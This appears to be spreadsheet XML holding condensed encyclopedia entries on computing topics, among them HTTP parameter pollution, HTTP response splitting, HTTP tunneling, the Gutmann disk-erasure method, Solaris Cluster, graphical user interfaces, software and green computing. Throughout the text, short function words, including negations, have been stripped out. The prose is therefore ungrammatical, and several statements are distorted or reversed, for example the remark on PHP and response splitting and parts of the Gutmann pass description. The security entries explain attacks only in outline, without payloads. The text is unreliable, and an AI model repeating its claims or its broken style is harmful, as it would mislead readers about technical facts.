    <t>http parameter pollution (hpp) application vulnerability exploited injecting encoded query string delimiters already existing parameters. vulnerability occurs user input correctly encoded output application. this vulnerability allows injection parameters application-created urls. first brought forth public 2009 stefano paola luca carettoni, conference owasp eu09 poland. impact vulnerability varies, range "simple annoyance" complete disruption intended behavior application. overriding http parameters alter application's behavior, bypassing input access validation checkpoints, well indirect vulnerabilities, possible consequences attack.there standard done passed multiple parameters. could used cross channel pollution, bypassing csrf protection input validation checks. behaviour when passed multiple parameters name, backend behaves. types client-side first order reflected second order stored third order server-side standard second order prevention proper input validation awareness technology protection http parameter pollution. also http response splitting http request smuggling references bibliography balduzzi, marco; torrano-gimenez, carmen; balzarotti, davide; kirda, engin (2011). automated discovery parameter pollution vulnerabilities applications. proceedings network distributed system security symposium, ndss 2011 researchgate.</t>
  </si>
  <si>
    <t>HTTP response splitting</t>
  </si>
  <si>
    <t>http response splitting form application vulnerability, resulting failure application environment properly sanitize input values. used perform cross-site scripting attacks, cross-user defacement, cache poisoning, similar exploits. attack consists making server print carriage return (cr, ascii 0x0d) line feed (lf, ascii 0x0a) sequence followed content supplied attacker header section response, typically including input fields sent application. http standard (rfc 2616), headers separated crlf response's headers separated body two. therefore, failure remove allows attacker arbitrary headers, take control body, break response separate responses—hence name. prevention generic solution url-encode strings inclusion http headers location set-cookie. typical examples sanitization include casting integers aggressive regular expression replacement. although response splitting specific php, interpreter contains protection attack since version 4.4.2 5.1.2. references external links divide conquer http response splitting, cache poisoning attacks, related topics. amit klein, 2004. target application vulnerable http header injection http response splitting, application security consortium wapiti open source xss, header, ldap injection scanner article cwe-113: failure sanitize crlf sequences http headers ('http response splitting') http response splitting attack owasp crlf injection owasp</t>
  </si>
  <si>
    <t>HTTP tunnel</t>
  </si>
  <si>
    <t>http tunneling used create network link computers conditions restricted network connectivity including firewalls, nats acls, among restrictions. tunnel created intermediary called proxy server usually located dmz. tunneling also allow communication using protocol normally wouldn’t supported restricted network. http connect method common form http tunneling standardized http connect method. mechanism, client asks http proxy server forward connection desired destination. server proceeds make connection behalf client. once connection established server, proxy server continues proxy stream client. only initial connection request http that, server simply proxies established connection. this mechanism client behind http proxy access websites using (i.e. https). proxy servers also limit connections allowing connections default https port 443, whitelisting hosts, blocking traffic appear ssl. example negotiation client connects proxy server requests tunneling specifying port host computer would like connect. port used indicate protocol requested. connection allowed proxy connected specified host proxy return success response. client proxied remote host. data sent proxy server forwarded, unmodified, remote host client communicate using protocol accepted remote host. example below, client starting communications, hinted port number initial connect request. ssh-2.0-openssh_4.3\r\n http tunneling without using connect http tunnel also implemented using usual http methods post, get, delete. this similar approach used bidirectional-streams over synchronous http (bosh). proof-of-concept program special http server runs outside protected network client program computer inside protected network. whenever network traffic passed client, client repackages traffic data http request relays data outside server, extracts executes original network request client. response request, sent server, repackaged http response relayed back client. since traffic encapsulated inside normal post requests responses, approach works proxies firewalls. also icmp tunnel pseudo-wire tunnel broker virtual private network (vpn) virtual extensible network virtualization using generic routing encapsulation references</t>
  </si>
  <si>
    <t>HAS-160</t>
  </si>
  <si>
    <t>has-160 cryptographic hash function designed korean kcdsa digital signature algorithm. derived sha-1, assorted changes intended increase security. produces 160-bit output. has-160 used sha-1. first divides input blocks bits pads final block. digest function updates intermediate hash value processing input blocks turn. message digest algorithm consists rounds. external links description has-160, test vectors. rhash, open source command-line tool capable calculating has-160.</t>
  </si>
  <si>
    <t>HAIFA construction</t>
  </si>
  <si>
    <t>haifa construction (hash iterative framework) cryptographic structure used design hash functions. modern alternatives merkle–damgård construction, avoiding weaknesses like length extension attacks. construction designed biham dunkelman 2007. three second round candidates nist hash function competition based haifa constructions (blake, shavite-3, echo). other hash functions based lake, sarmal, swifftx hnf-256. construction skein (unique block iteration) similar haifa. another alternative construction sponge construction. references</t>
  </si>
  <si>
    <t>Software blacklist</t>
  </si>
  <si>
    <t>software blacklisting tool used manufacturers software music prevent copying. essentially software disc audit user's computer certain types virtual authoring software, debugging software used warez groups create patches (known cracks) bypass copy protection schemes. blacklisted software found certain actions taken software game music disc. examples would allowing copying game take place, crashing copied game attempting start allowing copies games malfunction subtle ways simply disallowing game software exists. this software blacklisting seen countermeasure virtual cd/cd burning software used bypass copy protection schemes securom, safedisc laserlock. order copy user copy disc another computer (real virtual), uninstall blacklisted software wait update blacklisted software, countermeasure game music disc's blacklisting countermeasure. there also programs hide software blacklists, anti-blaxx. examples commonly blacklisted software daemon tools, nero alcohol 120%. also blacklist (computing)</t>
  </si>
  <si>
    <t>Gutmann method</t>
  </si>
  <si>
    <t>gutmann method algorithm securely erasing contents computer hard disk drives, files. devised peter gutmann colin plumb presented paper secure deletion data magnetic solid-state memory july 1996, involved writing series patterns region erased. selection patterns assumes user know encoding mechanism used drive, includes patterns designed specifically three types drives. user knows type encoding drive uses choose patterns intended drive. drive different encoding mechanism would need different patterns. most patterns gutmann method designed older mfm/rll encoded disks. gutmann noted modern drives longer older encoding techniques, making parts method irrelevant. said time since paper published, people treated 35-pass overwrite technique described kind voodoo incantation banish evil spirits result technical analysis drive encoding techniques".since 2001, sata hard drive manufacturer designs include support secure erase standard, obviating need apply gutmann method erasing entire drive. however, 2011 research found manufacturers implement secure erase correctly. method overwrite session consists lead-in four random write patterns, followed patterns (see rows table below), executed random order, lead-out four random patterns. each patterns designed specific magnetic media encoding scheme mind, pattern targets. drive written passes even though table shows patterns passes specifically targeted encoding scheme. result obscure data drive advanced physical scanning (e.g., using magnetic force microscope) drive likely able recover data. series patterns follows: encoded bits shown bold present ideal pattern, although encoding complementary actually present start track. criticism delete function operating systems simply marks space occupied file reusable (removes pointer file) without immediately removing contents. point file fairly easily recovered numerous recovery applications. however, space overwritten data, known software recover cannot done software alone since storage device returns current contents normal interface. gutmann claims intelligence agencies sophisticated tools, including magnetic force microscopes, together image analysis, detect previous values bits affected area media (for example hard disk). daniel feenberg national bureau economic research, american private nonprofit research organization, criticized gutmann's claim intelligence agencies likely able read overwritten data, citing lack evidence claims. nevertheless, published government security procedures consider disk overwritten still sensitive.gutmann responded criticisms also criticized algorithm abused epilogue original paper, states: time since paper published, people treated 35-pass overwrite technique described kind voodoo incantation banish evil spirits result technical analysis drive encoding techniques. result, advocate applying voodoo prml eprml drives even though effect simple scrubbing random data. fact performing full 35-pass overwrite pointless drive since targets blend scenarios involving types (normally-used) encoding technology, covers everything back 30+-year-old methods understand statement, re-read paper). using drive uses encoding technology need perform passes specific never need perform passes. modern prml/eprml drive, passes random scrubbing best paper says, good scrubbing random data well expected". this true 1996, still true now. also data remanence data recovery computer forensics notes external links secure deletion data magnetic solid-state memory, gutmann's original paper</t>
  </si>
  <si>
    <t>Solaris Cluster</t>
  </si>
  <si>
    <t>oracle solaris cluster (sometimes cluster suncluster) high-availability cluster software product solaris, originally created microsystems, acquired oracle corporation 2010. used improve availability software services databases, file sharing network, electronic commerce websites, applications. cluster operates redundant computers nodes computers continue provide service another fails. nodes located data center different continents. background solaris cluster provides services remain available even individual nodes components cluster fail. solaris cluster provides types services: failover services scalable services. eliminate single points failure, solaris cluster configuration redundant components, including multiple network connections data storage multiply connected storage area network. clustering software solaris cluster component business continuity solution, solaris cluster geographic edition created specifically address requirement. solaris cluster example kernel-level clustering software. some processes runs normal system processes systems operates special access operating system kernel functions host systems. june 2007, released source code solaris cluster opensolaris clusters community. solaris cluster geographic edition scge management framework introduced august 2005. enables solaris cluster installations managed unit, conjunction data replication products, provide disaster recovery computer installation. ensuring data updates continuously replicated remote site near-real time, site rapidly take provision service event entire primary site lost result disaster, either natural man-made. this minimizing recovery point objective (rpo) recovery time objective (rto) service. proxy file system pxfs (proxy file system) distributed, high availability, posix compliant filesystem internal solaris cluster nodes. global devices cluster made possible pxfs. supported applications solaris cluster uses software components called agents monitor application detect whether operating correctly, take action problem detected. agents common applications included siebel systems, livecache, weblogic server, java application server, mysql, oracle rac, oracle e-business suite samba among others; also wizard allows cluster implementer create agents applications. releases oracle solaris cluster 11.2 july 2014 (2014-07-31) also computer cluster high-availability cluster sunplex manager, used view status administer aspects solaris cluster references external links solaris cluster webpage oracle opensolaris clusters community blueprint: using solaris cluster cluster geographic edition virtualization technologies blogs solaris cluster cluster oasis* greg pfister: search clusters, prentice hall, isbn 0-13-899709-8 evan marcus, stern: blueprints high availability: designing resilient distributed systems, john wiley sons, isbn 0-471-35601-8 joseph bianco, peter lees, kevin rabito: cluster programming: integrating applications sunplex environment, prentice hall, isbn 0-13-047975-6 richard elling, read: designing enterprise solutions cluster 3.0, prentice hall, isbn 0-13-008458-1 kristien hens, michael loebmann: creating highly available database solutions: oracle real application clusters (rac) cluster software, prentice hall, isbn 0-13-186390-8</t>
  </si>
  <si>
    <t>Graphical user interface</t>
  </si>
  <si>
    <t>jee-yoo-eye goo-ee), graphical user interface, form user interface allows users interact electronic devices graphical icons audio indicator primary notation, instead text-based uis, typed command labels text navigation. guis introduced reaction perceived steep learning curve clis (command-line interfaces), require commands typed computer keyboard. actions usually performed direct manipulation graphical elements. beyond computers, guis used many handheld mobile devices players, portable media players, gaming devices, smartphones smaller household, office industrial controls. term tends applied lower-display resolution types interfaces, video games (where (head-up display) preferred), including flat screens like volumetric displays term restricted scope display screens able describe generic information, tradition computer science research xerox palo alto research center. interaction design designing visual composition temporal behavior important part software application programming area human–computer interaction. goal enhance efficiency ease underlying logical design stored program, design discipline named usability. methods user-centered design used ensure visual language introduced design well-tailored tasks. visible graphical interface features application sometimes referred chrome (pronounced gooey). typically, users interact information manipulating visual widgets allow interactions appropriate kind data hold. widgets well-designed interface selected support actions necessary achieve goals users. model–view–controller allows flexible structures interface independent indirectly linked application functions, customized easily. this allows users select design different skin will, eases designer's work change interface user needs evolve. good design relates users more, system architecture less. large widgets, windows, usually provide frame container main presentation content page, email message, drawing. smaller ones usually user-input tool. designed requirements vertical market application-specific guis. examples include automated teller machines (atm), point sale (pos) touchscreens restaurants, self-service checkouts used retail store, airline self-ticket check-in, information kiosks public space, like train station museum, monitors control screens embedded industrial application employ real-time operating system (rtos). cell phones handheld game systems also employ application specific touchscreen guis. newer automobiles guis navigation systems multimedia centers, navigation multimedia center combinations. examples sample graphical environments components uses combination technologies devices provide platform users interact with, tasks gathering producing information. series elements conforming visual language evolved represent information stored computers. this makes easier people computer skills work computer software. common combination elements guis windows, icons, text fields, canvases, menus, pointer (wimp) paradigm, especially personal computers.the wimp style interaction uses virtual input device represent position pointing device's interface, often mouse, presents information organized windows represented icons. available commands compiled together menus, actions performed making gestures pointing device. window manager facilitates interactions windows, applications, windowing system. windowing system handles hardware devices pointing devices, graphics hardware, positioning pointer. personal computers, elements modeled desktop metaphor produce simulation called desktop environment display represents desktop, documents folders documents placed. window managers software combine simulate desktop environment varying degrees realism. entries appear list make space text details, grid compactness larger icons little space underneath text. variations inbetween exist, list multiple columns items grid items rows text extending sideways icon.multi-row multi-column layouts commonly found "shelf" "waterfall". former found image search engines, images appear fixed height variable length, typically implemented property parameter display: inline-block;. waterfall layout found imgur tweetdeck fixed width variable height item usually implemented specifying column-width:. post-wimp interface smaller mobile devices personal digital assistants (pdas) smartphones typically wimp elements different unifying metaphors, constraints space available input devices. applications wimp well suited newer interaction techniques, collectively termed post-wimp uis.as 2011, touchscreen-based operating systems apple's (iphone) android class guis named post-wimp. these support styles interaction using finger contact display, allows actions pinching rotating, unsupported pointer mouse. interaction human interface devices, efficient interaction include computer keyboard, especially used together keyboard shortcuts, pointing devices cursor rather pointer) control: mouse, pointing stick, touchpad, trackball, joystick, virtual keyboards, head-up displays (translucent information devices level). there also actions performed programs affect gui. example, components like inotify d-bus facilitate communication computer programs. history early efforts ivan sutherland developed sketchpad 1963, widely held first graphical computer-aided design program. used light create manipulate objects engineering drawings realtime coordinated graphics. late 1960s, researchers stanford research institute, douglas engelbart, developed on-line system (nls), used text-based hyperlinks manipulated then-new device: mouse. 1968 demonstration became known "the mother demos.") 1970s, engelbart's ideas refined extended graphics researchers xerox parc specifically alan kay, went beyond text-based hyperlinks used main interface smalltalk programming language, xerox alto computer, released 1973. most modern general-purpose guis derived system. xerox parc consisted graphical elements windows, menus, radio buttons, check boxes. concept icons later introduced david canfield smith, written thesis subject guidance kay. parc employs pointing device along keyboard. these aspects emphasized using alternative term acronym windows, icons, menus, pointing device (wimp). this effort culminated 1973 xerox alto, first computer gui, though system never reached commercial production. first commercially available computer 1979 perq workstation, manufactured three rivers computer corporation. design heavily influenced work xerox parc. 1981, xerox eventually commercialized alto form enhanced system xerox 8010 information system commonly known xerox star. these early systems spurred many efforts, including lisp machines symbolics manufacturers, apple lisa (which presented concept menu window controls) 1983, apple macintosh 128k 1984, atari digital research's gem, commodore amiga 1985. visi released 1983 compatible computers, never popular high hardware demands. nevertheless, crucial influence contemporary development microsoft windows.apple, digital research, microsoft used many xerox's ideas develop products, ibm's common user access specifications formed basis guis used microsoft windows, os/2 presentation manager, unix motif toolkit window manager. these ideas evolved create interface found current versions microsoft windows, various desktop environments unix-like operating systems, macos linux. thus current guis largely common idioms. popularization guis topic early 1980s. apple lisa released 1983, various windowing systems existed operating systems (including pc/geos). individual applications many platforms presented variants. despite guis advantages, many reviewers questioned value entire concept, citing hardware limits, problems finding compatible software. 1984, apple released television commercial introduced apple macintosh telecast super bowl xviii cbs, allusions george orwell's noted novel nineteen eighty-four. goal commercial make people think computers, identifying user-friendly interface personal computer departed prior business-oriented systems, becoming signature representation apple products.windows accompanied extensive marketing campaign, major success marketplace launch shortly became popular desktop operating system.in 2007, iphone later 2010 introduction ipad, apple popularized post-wimp style interaction multi-touch screens, devices considered milestones development mobile devices.the guis familiar people mid-late 2010s microsoft windows, macos, window system interfaces desktop laptop computers, android, apple's ios, symbian, blackberry windows phone/windows mobile, tizen, webos, firefox handheld (smartphone) devices. comparison interfaces command-line interfaces since commands available command line interfaces many, complex operations performed using short sequence words symbols. custom functions used facilitate access frequent actions. command-line interfaces lightweight, recall information necessary task; example, preview thumbnails graphical rendering pages. this allows greater efficiency productivity many commands learned. reaching level takes time command words easily discoverable mnemonic. also, using command line become slow error-prone users must enter long commands comprising many parameters several different filenames once. however, windows, icons, menus, pointer (wimp) interfaces present users many widgets represent trigger system's available commands. guis made quite hard dialogs buried deep system moved different places redesigns. also, icons dialog boxes usually harder users script. wimps extensively modes, meaning keys clicks specific positions screen redefined time. command-line interfaces modes limited forms, current directory environment variables. most modern operating systems provide level cli, although guis usually receive attention. wrappers wrappers find around command-line interface versions (cli) (typically) linux unix-like software applications text-based typed command labels. while command-line text-based applications allow users program non-interactively, wrappers atop avoid steep learning curve command-line, requires commands typed keyboard. starting wrapper, users intuitively interact with, start, stop, change working parameters, graphical icons visual indicators desktop environment, example. applications also provide interfaces, usually wimp wrapper around command-line version. this especially common applications designed unix-like operating systems. latter used implemented first allowed developers focus exclusively product's functionality without bothering interface details designing icons placing buttons. designing programs also allows users program shell script. three-dimensional graphical user interface many environments games methods graphics project objects onto screen. graphics become increasingly common mainstream operating systems (ex. windows aero, aqua (macos)) create attractive interfaces, termed candy, functional purposes possible using three dimensions. example, user switching represented rotating cube faces representing user's workspace, window management represented rolodex-style flipping mechanism windows vista (see windows flip 3d). cases, operating system transforms windows on-the-fly continuing update content windows. usually wimp-based, although occasionally metaphors surface, used microsoft bob, 3dwm, file system navigator, file system visualizer, mailbox. zooming (zui) related technology promises deliver representation benefits environments without usability drawbacks orientation problems hidden objects. 2006, hillcrest labs introduced first television. other innovations include menus playstation menus xbox, sun's project looking glass, metisse, similar project looking glass, bumptop, users manipulate documents windows realistic movement physics physical documents, croquet built collaboration, compositing window managers enlightenment compiz. augmented reality virtual reality also make elements. science fiction guis appeared science fiction literature films, even certain technologies feasible common use. prose fiction, guis portrayed immersible environments, coined william gibson's "cyberspace" neal stephenson's "metaverse" "avatars". 1993 american film jurassic park features silicon graphics' file manager file system navigator, real-life file manager unix operating systems. film minority report scenes police officers using specialized data systems. also notes references external links evolution graphical user interface last years really invented clive akass graphical user interface gallery, screenshots various guis marcin wichary's guidebook, graphical user interface gallery: 5500 screenshots gui, application icon history real history mike tuck beginning command line neal stephenson graphical user interfaces (pdf) farid benhajji erik dybner, department computer systems sciences, stockholm university topological analysis gibbs energy function (liquid-liquid equilibrium correlation data). including thermodinamic review graphical user interface (gui) surfaces/tie-lines/hessian matrix analysis university alicante (reyes-labarta 2015-18) innovative ways information visualization across variety fields ryan erwin digital marketing specialist cllax (2022-05)</t>
  </si>
  <si>
    <t>Graphics Turing Test</t>
  </si>
  <si>
    <t>computer graphics graphics turing test variant turing test, twist human judge viewing interacting artificially generated world unable reliably distinguish reality.the original formulation test "the subject views interacts real computer generated scene. test passed subject determine reality simulated reality better random guess. subject operates remotely controlled simulated) robotic views computer screen. subject enters door controlled vehicle motion simulator computer screens windows. patch worn stereo vision difficult simulate."the "graphics turing scale" computer power defined computing power necessary achieve success test. estimated 1036.8 tflops peak 518.4 tflops sustained. actual rendering tests blue gene supercomputer showed current supercomputers task scale yet.a restricted form graphic turing test investigated, test subjects look tell whether contents real virtual objects. simple case scenes cardboard pyramid styrofoam sphere, subjects able reliably tell reality graphics apart. also virtual reality captcha references external links matrix-style virtual worlds years away' scientist</t>
  </si>
  <si>
    <t>Software</t>
  </si>
  <si>
    <t>software computer programs associated documentation data. this contrast hardware, system built actually performs work. lowest programming level, executable code consists machine language instructions supported individual processor—typically central processing unit (cpu) graphics processing unit (gpu). machine language consists groups binary values signifying processor instructions change state computer preceding state. example, instruction change value stored particular storage location computer—an effect directly observable user. instruction also invoke many input output operations, example displaying text computer screen; causing state changes visible user. processor executes instructions order provided, unless instructed "jump" different instruction, interrupted operating system. 2015, personal computers, smartphone devices servers processors multiple execution units multiple processors performing computation together, computing become much concurrent activity past. majority software written high-level programming languages. they easier efficient programmers closer natural languages machine languages. high-level languages translated machine language using compiler interpreter combination two. software also written low-level assembly language, strong correspondence computer's machine language instructions translated machine language using assembler. history algorithm would first piece software written lovelace 19th century, planned analytical engine. created proofs show engine would calculate bernoulli numbers. because proofs algorithm, considered first computer programmer.the first theory software, prior creation computers know today, proposed alan turing 1935 essay, computable numbers, application entscheidungsproblem (decision problem). this eventually creation academic fields computer science software engineering; fields study software creation. computer science theoretical study computer software (turing's essay example computer science), whereas software engineering application engineering principles development software. prior 1946, software programs stored memory stored-program digital computers, understand first electronic computing devices instead rewired order "reprogram" them.in 2000, fred shapiro, librarian yale school, published letter revealing john wilder tukey's 1958 paper "the teaching concrete mathematics" contained earliest known usage term "software" found search jstor's electronic archives, predating oed's citation years. this many credit tukey coining term, particularly obituaries published year, although tukey never claimed credit coinage. 1995, paul niquette claimed originally coined term october 1953, although could find documents supporting claim. earliest known publication term "software" engineering context august 1953 richard carhart, rand corporation research memorandum. types virtually computer platforms, software grouped broad categories. purpose, domain based goal, computer software divided into: application software uses computer system perform special functions beyond basic operation computer itself. there many different types application software range tasks performed modern computer large—see list software. system software manages hardware behaviour, provide basic functionalities required users, software properly, all. system software also designed providing platform running application software, includes following: operating systems essential collections software manage resources provide common services software runs top" them. supervisory programs, boot loaders, shells window systems core parts operating systems. practice, operating system comes bundled additional software (including application software) user potentially work computer operating system. device drivers operate control particular type device attached computer. each device needs least corresponding device driver; computer typically minimum least input device least output device, computer typically needs device driver. utilities computer programs designed assist users maintenance care computers. malicious software, malware, software developed harm disrupt computers. malware closely associated computer-related crimes, though malicious programs designed practical jokes. nature domain execution desktop applications browsers microsoft office libreoffice wordperfect, well smartphone tablet applications (called "apps"). javascript scripts pieces software traditionally embedded pages directly inside browser page loaded without need browser plugin. software written programming languages also within browser software either translated javascript, browser plugin supports language installed; common example latter actionscript scripts, supported adobe flash plugin. server software, including: applications, usually server output dynamically generated pages browsers, using e.g. php, java, asp.net, even javascript runs server. modern times commonly include javascript browser well, case typically partly server, partly browser. plugins extensions software extends modifies functionality another piece software, require software used order function. embedded software resides firmware within embedded systems, devices dedicated single uses cars televisions (although embedded devices wireless chipsets part ordinary, non-embedded computer system smartphone). embedded system context sometimes clear distinction system software application software. however, embedded systems embedded operating systems, systems retain distinction system software application software (although typically one, fixed application always run). microcode special, relatively obscure type embedded software tells processor execute machine code, actually lower level machine code. typically proprietary processor manufacturer, necessary correctional microcode software updates supplied users (which much cheaper shipping replacement processor hardware). thus ordinary programmer would expect ever deal programming tools programming tools also software form programs applications developers create, debug, maintain, otherwise support software.software written programming languages; many programming languages existence, least implementation, consists programming tools. these tools relatively self-contained programs compilers, debuggers, interpreters, linkers, text editors, combined accomplish task; form integrated development environment (ide), combines much functionality self-contained tools. ides either invoking relevant individual tools re-implementing functionality way. make easier specific tasks, searching files particular project. many programming language implementations provide option using individual tools ide. topics architecture people modern general purpose computers opposed embedded systems, analog computers supercomputers) usually three layers software performing variety tasks: platform, application, user software. platform software: platform includes firmware, device drivers, operating system, typically graphical user interface which, total, allow user interact computer peripherals (associated equipment). platform software often comes bundled computer. usually ability change platform software. application software: application software people think think software. typical examples include office suites video games. application software often purchased separately computer hardware. sometimes applications bundled computer, change fact independent applications. applications usually independent programs operating system, though often tailored specific platforms. most users think compilers, databases, "system software" applications. user-written software: end-user development tailors systems meet users' specific needs. user software includes spreadsheet templates word processor templates. even email filters kind user software. users create software often overlook important depending competently user-written software integrated default application packages, many users aware distinction original packages, added co-workers. execution computer software "loaded" computer's storage (such hard drive memory). once software loaded, computer able execute software. this involves passing instructions application software, system software, hardware ultimately receives instruction machine code. each instruction causes computer carry operation—moving data, carrying computation, altering control flow instructions.data movement typically place memory another. sometimes involves moving data memory registers enable high-speed data access cpu. moving data, especially large amounts costly; sometimes avoided using "pointers" data instead. computations include simple operations incrementing value variable data element. more complex computations involve many operations data elements together. quality reliability software quality important, especially commercial system software. software faulty, delete person's work, crash computer unexpected things. faults errors called "bugs" often discovered alpha beta testing. software often also victim known software aging, progressive performance degradation resulting combination unseen bugs.many bugs discovered fixed software testing. however, software testing rarely—if ever—eliminates every bug; programmers "every program least bug" (lubarsky's law). waterfall method software development, separate testing teams typically employed, newer approaches, collectively termed agile software development, developers often testing, demonstrate software users/clients regularly obtain feedback. software tested unit testing, regression testing methods, done manually, commonly, automatically, since amount code tested large. programs containing command software enable hardware engineering system operations function much easier together. license software's license gives user right software licensed environment, case free software licenses, also grants rights right make copies.proprietary software divided types: freeware, includes category "free trial" software "freemium" software past, term shareware often used free trial/freemium software). name suggests, freeware used free, although case free trials freemium software, sometimes true limited period time limited functionality. software available fee, legally used purchase license.open-source software comes free software license, granting recipient rights modify redistribute software. patents software patents, like types patents, theoretically supposed give inventor exclusive, time-limited license detailed idea (e.g. algorithm) implement piece software, component piece software. ideas useful things software could user requirements, supposed patentable, concrete implementations (i.e. actual software packages implementing patent) supposed patentable either—the latter already covered copyright, generally automatically. software patents supposed cover middle area, requirements concrete implementation. countries, requirement claimed invention effect physical world also part requirements software patent held valid—although since useful software effects physical world, requirement open debate. meanwhile, american copyright applied various aspects writing software code.software patents controversial software industry many people holding different views them. sources controversy aforementioned split initial ideas patent seem honored practice patent lawyers—for example patent aspect-oriented programming (aop), purported claim rights programming tool implementing idea aop, howsoever implemented. another source controversy effect innovation, many distinguished experts companies arguing software fast-moving field software patents merely create vast additional litigation costs risks, actually retard innovation. case debates software patents outside united states, argument made large american corporations patent lawyers likely primary beneficiaries allowing continue allow software patents. design implementation design implementation software varies depending complexity software. instance, design creation microsoft word took much time designing developing microsoft notepad former much basic functionality.software usually developed integrated development environments (ide) like eclipse, intellij microsoft visual studio simplify process compile software. noted different section, software usually created existing software application programming interface (api) underlying software provides like gtk+, javabeans swing. libraries (apis) categorized purpose. instance, spring framework used implementing enterprise applications, windows forms library used designing graphical user interface (gui) applications like microsoft word, windows communication foundation used designing services. when program designed, relies upon api. instance, microsoft windows desktop application might call functions .net windows forms library like form1.close() form1.show() close open application. without apis, programmer needs write functionalities entirely themselves. companies like oracle microsoft provide apis many applications written using software libraries usually numerous apis them.data structures hash tables, arrays, binary trees, algorithms quicksort, useful creating software. computer software special economic characteristics make design, creation, distribution different economic goods.a person creates software called programmer, software engineer software developer, terms similar meaning. more informal terms programmer also exist "coder" "hacker" although latter word cause confusion, often used mean someone illegally breaks computer systems. also computer program independent software vendor open-source software outline software software asset management software release life cycle references sources evans, claire (2018). broad band: untold story women made internet. york: portfolio/penguin. isbn 9780735211759. external links software curlie</t>
  </si>
  <si>
    <t>Software taggant</t>
  </si>
  <si>
    <t>software taggant cryptographic signature added software enables positive origin identification integrity programs. software taggants standard techniques (see public infrastructure) introduced industry connections security group ieee attempt control proliferation malware obfuscated executable compression (runtime packer). concept pki-based system mitigate runtime packer abuse introduced 2010 described black briefings presentation mark kennedy igor muttik. term proposed arun lakhotia (due similarities chemical taggants) also analyzed economics packer ecosystem.a software taggant form code signing somewhat similar microsoft's authenticode. differences software taggant authenticode transparent free addition software taggant user runtime packer. also, software taggant cover small critical areas program minimize cost software integrity checking. contrast, authenticode always covers nearly entire file cost checking linearly depends file size. software taggant project ieee icsg open-source nature hosted github relies openssl. software taggants also help legitimate software malware also utilize anti-tampering methods. references</t>
  </si>
  <si>
    <t>Green computing</t>
  </si>
  <si>
    <t>green computing, green sustainability, study practice environmentally sustainable computing goals green computing similar green chemistry: reduce hazardous materials, maximize energy efficiency product's lifetime, recyclability biodegradability defunct products factory waste. green computing important classes systems, ranging handheld systems large-scale data centers. many corporate departments green computing initiatives reduce environmental effect operations. origins 1992, u.s. environmental protection agency launched energy star, voluntary labeling program designed promote recognize energy efficiency monitors, climate control equipment, technologies. this resulted widespread adoption sleep mode among consumer electronics. concurrently, swedish organization development launched certified program promote magnetic electrical emissions crt-based computer displays; program later expanded include criteria energy consumption, ergonomics, hazardous materials construction. regulations industry initiatives organisation economic co-operation development (oecd) published survey government industry initiatives "green icts", i.e. information communication technologies, environment climate change. report concludes initiatives tend concentrate greening icts rather actual implementation tackle global warming environmental degradation. general, initiatives measurable targets, government programs tending include targets frequently business associations. government many governmental agencies continued implement standards regulations encourage green computing. energy star program revised october 2006 include stricter efficiency requirements computer equipment, along tiered ranking system approved products.by 2008, states established statewide recycling programs obsolete computers consumer electronics equipment. statutes either impose "advance recovery fee" unit sold retail require manufacturers reclaim equipment disposal. 2010, american recovery reinvestment (arra) signed legislation president obama. bill allocated billion invested green initiatives (renewable energy, smart grids, energy efficiency, etc.) january 2010, u.s. energy department granted million arra money towards projects improve energy efficiency data centers. projects provided research optimize data center hardware software, improve power supply chain, data center cooling technologies. industry imasons climate accord founded 2022, (ica) historic cooperative companies committed reducing carbon digital infrastructure materials, products, power. climate savers computing initiative (csci) effort reduce electric power consumption active inactive states. csci provides catalog green products member organizations, information reducing power consumption. started june 2007. name stems world wildlife fund's climate savers program, launched 1999. also member computing initiative. green electronics council offers electronic product environmental assessment tool (epeat) assist purchase "greener" computing systems. council evaluates computing equipment criteria required optional measure product's efficiency sustainability attributes. products rated gold, silver, bronze, depending many optional criteria meet. january 2007, president george bush issued executive order 13423, requires united states federal agencies epeat purchasing computer systems. green grid global consortium dedicated advancing energy efficiency data centers business computing ecosystems. founded february 2007 several companies industry amd, apc, dell, ibm, intel, microsoft, rackable systems, spraycool (purchased 2010 parker), microsystems vmware. green grid since grown hundreds members, including end-users government organizations, focused improving data center infrastructure efficiency (dcie). green500 list rates supercomputers energy efficiency (megaflops/watt), encouraging focus efficiency rather absolute performance. green comm challenge organization promotes development energy conservation technology practices field information communications technology (ict). transaction processing performance council (tpc) energy specification augments existing benchmarks allowing optional publications energy metrics alongside performance results. specpower first industry standard benchmark measures power consumption relation performance server-class computers. other benchmarks measure energy efficiency include specweb, specvirt, vmmark. approaches modern systems rely upon complicated people, networks, hardware; such, green computing initiative must cover areas well. solution also need address user satisfaction, management restructuring, regulatory compliance, return investment (roi). there also considerable fiscal motivations companies take control power consumption; power management tools available, powerful still simple, plain, common sense." product longevity gartner maintains manufacturing process accounts natural resources used life cycle more recently, fujitsu released life-cycle assessment (lca) desktop show manufacturing life accounts majority desktop's ecological footprint. therefore, biggest contribution green computing usually prolong equipment's lifetime. another report gartner recommends "look product longevity, including upgradability modularity." instance, manufacturing makes bigger ecological footprint manufacturing module upgrade existing one. data center design data center facilities heavy consumers energy, accounting 1.1% 1.5% world's total energy 2010 [1]. u.s. department energy estimates data center facilities consume times energy standard office buildings.energy efficient data center design address energy aspects included data center: equipment hvac(heating, ventilation conditioning) equipment actual location, configuration construction building. u.s. department energy specifies five primary areas focus energy efficient data center design best practices: information technology (it) systems environmental conditions management cooling systems electrical systemsadditional energy efficient design opportunities specified u.s. department energy include on-site electrical generation recycling waste heat.energy efficient data center design help better utilize data center's space, increase performance efficiency. 2018, three patents make facilities design simultaneously cool produce electrical power internal external waste heat. three patents silo design stimulating internal waste heat, recirculation cooling silo's computing racks. patent 9,510,486, uses recirculating power generation, sister patent, patent 9,907,213, forces recirculation air, sister patent, patent 10,020,436, uses thermal differences temperature resulting negative power usage effectiveness. negative power usage effectiveness, makes extreme differences temperatures times running computing facilities, would external sources power computing. software deployment optimization algorithmic efficiency efficiency algorithms affects amount computer resources required given computing function many efficiency trade-offs writing programs. algorithm changes, switching slow (e.g. linear) search algorithm fast (e.g. hashed indexed) search algorithm reduce resource usage given task substantial close zero. 2009, study physicist harvard estimated average google search released grams carbon dioxide (co₂). however, google disputed figure, arguing instead typical search produced grams co₂. resource allocation algorithms also used route data data centers electricity less expensive. researchers mit, carnegie mellon university, akamai tested energy allocation algorithm successfully routes traffic location cheapest energy costs. researchers project percent savings energy costs proposed algorithm deployed. however, approach actually reduce amount energy used; reduces cost company using nonetheless, similar strategy could used direct traffic rely energy produced environmentally friendly efficient way. similar approach also used energy usage routing traffic away data centers experiencing warm weather; allows computers shut avoid using conditioning.larger server centers sometimes located energy land inexpensive readily available. local availability renewable energy, climate allows outside used cooling, locating heat produce used purposes could factors green 